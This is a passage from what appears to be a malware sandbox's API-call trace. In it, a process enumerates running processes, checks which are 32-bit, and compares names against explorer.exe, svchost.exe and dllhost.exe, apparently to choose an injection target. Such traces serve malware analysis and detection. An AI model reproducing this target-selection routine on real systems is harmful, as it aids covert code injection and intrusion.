szExeFile="lsm.exe")) returned 1 [0187.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0187.669] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0187.669] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0187.670] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0187.670] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0187.671] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0187.671] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0187.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0187.672] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0187.672] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0187.673] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0187.673] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.673] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.673] CloseHandle (hObject=0xec) returned 1 [0187.673] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0187.674] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0187.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0187.674] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.674] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.674] CloseHandle (hObject=0xec) returned 1 [0187.674] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0187.675] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0187.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0187.676] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0187.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0187.676] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.676] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.676] CloseHandle (hObject=0xec) returned 1 [0187.676] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0187.676] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0187.676] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0187.676] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0187.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0187.677] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.677] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.677] CloseHandle (hObject=0xec) returned 1 [0187.677] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0187.677] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0187.677] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0187.677] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0187.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0187.678] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.678] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.678] CloseHandle (hObject=0xec) returned 1 [0187.678] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0187.678] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0187.678] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0187.678] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0187.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0187.678] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.678] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.678] CloseHandle (hObject=0xec) returned 1 [0187.679] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0187.679] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0187.679] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0187.679] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0187.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0187.680] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.680] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.680] CloseHandle (hObject=0xec) returned 1 [0187.680] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0187.680] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0187.680] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0187.680] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0187.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0187.681] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.681] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.681] CloseHandle (hObject=0xec) returned 1 [0187.681] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0187.681] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0187.681] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0187.681] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0187.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0187.681] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.681] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.681] CloseHandle (hObject=0xec) returned 1 [0187.681] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0187.681] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0187.682] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0187.682] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0187.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0187.682] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.682] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.682] CloseHandle (hObject=0xec) returned 1 [0187.682] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0187.682] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0187.682] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0187.682] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0187.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0187.683] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.683] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.683] CloseHandle (hObject=0xec) returned 1 [0187.683] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0187.683] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0187.683] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0187.683] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0187.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0187.684] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.684] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.684] CloseHandle (hObject=0xec) returned 1 [0187.684] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0187.684] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0187.684] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0187.684] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0187.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0187.684] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.684] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.684] CloseHandle (hObject=0xec) returned 1 [0187.684] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0187.684] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0187.684] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0187.684] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0187.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0187.685] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.685] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.685] CloseHandle (hObject=0xec) returned 1 [0187.685] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0187.685] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0187.685] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0187.685] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0187.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0187.686] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.686] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.686] CloseHandle (hObject=0xec) returned 1 [0187.686] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0187.686] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0187.686] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0187.686] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0187.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0187.686] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.686] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.686] CloseHandle (hObject=0xec) returned 1 [0187.687] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0187.687] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0187.687] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0187.687] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0187.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0187.687] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.687] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.687] CloseHandle (hObject=0xec) returned 1 [0187.687] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0187.687] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0187.687] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0187.687] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0187.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0187.688] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.688] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.688] CloseHandle (hObject=0xec) returned 1 [0187.688] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0187.688] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0187.688] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0187.688] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0187.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0187.689] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.689] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.689] CloseHandle (hObject=0xec) returned 1 [0187.689] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0187.689] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0187.689] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0187.689] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0187.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0187.689] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.689] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.689] CloseHandle (hObject=0xec) returned 1 [0187.689] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0187.689] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0187.689] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0187.689] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0187.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0187.690] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.690] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.690] CloseHandle (hObject=0xec) returned 1 [0187.690] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0187.690] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0187.690] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0187.690] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0187.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0187.691] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.691] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.691] CloseHandle (hObject=0xec) returned 1 [0187.691] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0187.691] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0187.691] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0187.691] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0187.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0187.691] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.691] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0187.692] CloseHandle (hObject=0xec) returned 1 [0187.692] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0187.692] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0187.692] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0187.692] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0187.693] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0187.693] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, 